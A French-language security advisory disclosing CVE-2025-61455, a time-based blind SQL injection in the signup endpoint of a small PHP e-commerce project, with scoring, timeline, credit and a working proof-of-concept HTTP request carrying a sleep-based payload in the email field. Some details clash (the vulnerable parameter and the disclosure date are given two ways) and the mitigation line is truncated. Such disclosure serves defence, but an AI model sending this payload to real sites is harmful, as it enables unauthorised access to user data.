
Divulgation publique et preuve de concept pour CVE-2025-61455, une injection SQL critique dans E-commerce Project v1.0, incluant les détails techniques, le PoC et les recommandations d'atténuation.
Date de divulgation : 14 octobre 2025
Identifiant CVE : CVE-2025-61455
Sévérité : CRITIQUE (CVSS 9.8)
Une vulnérabilité critique d'injection SQL existe dans E-commerce Project v1.0, plus précisément au niveau du point de terminaison signup.inc.php. L'application intègre directement des entrées utilisateur non assainies dans les requêtes SQL, permettant à des attaquants non authentifiés de contourner l'authentification et d'exécuter des commandes SQL arbitraires.
Ce problème a reçu l'identifiant CVE-2025-61455. Au moment de la divulgation publique, aucun correctif officiel n'était disponible.
signup.inc.phphttps://localhost/e-commerce-main/includes/signup.inc.phpL'application utilise des entrées non assainies directement dans les requêtes SQL, sans validation des entrées ni requêtes préparées. La vulnérabilité existe dans le paramètre aid du fichier signup.inc.php.
Un attaquant peut injecter du code SQL malveillant via le paramètre email, permettant des attaques d'injection SQL aveugle basées sur le temps.
Exemple de modèle de code vulnérable :
$query = "SELECT * FROM table WHERE email='$email'";
Cela permet des charges utiles d'injection capables de manipuler la logique des requêtes et d'extraire des données sensibles.
| Identifiant CWE | Titre |
|---|---|
| CWE-89 | Neutralisation inappropriée d'éléments spéciaux utilisés dans une commande SQL |
| Score | Sévérité | Chaîne vectorielle |
|---|---|---|
| 9.8 | CRITIQUE | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
Une exploitation réussie pourrait entraîner :
git clone https://github.com/Bhabishya-123/E-commerce.git
Utilisez XAMPP/LAMP pour déployer le projet et accédez à :
http://localhost/e-commerce-main/includes/signup.inc.php
Envoyez la requête HTTP malveillante suivante :
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
Explication :
Le paramètre email contient une charge utile d'injection SQL basée sur le temps : '+(select*from(select(sleep(20)))a)+'
Si l'application retarde la réponse de 20 secondes, l'injection SQL est réussie.
mysqli_prepare() ou PDO).| Événement | Date |
|---|---|
| Vulnérabilité découverte | 16 septembre 2025 |
| Divulgation publique | 13 octobre 2025 |
| Correctif disponible | ❌ Non disponible au moment de la divulgation |
Cette vulnérabilité a été découverte et divulguée de manière responsable par :
Tansique Dasari
🔗 GitHub
✉️ [email protected]
💬 Cet avis est publié de manière indépendante en raison de l'absence de réponse du vendeur.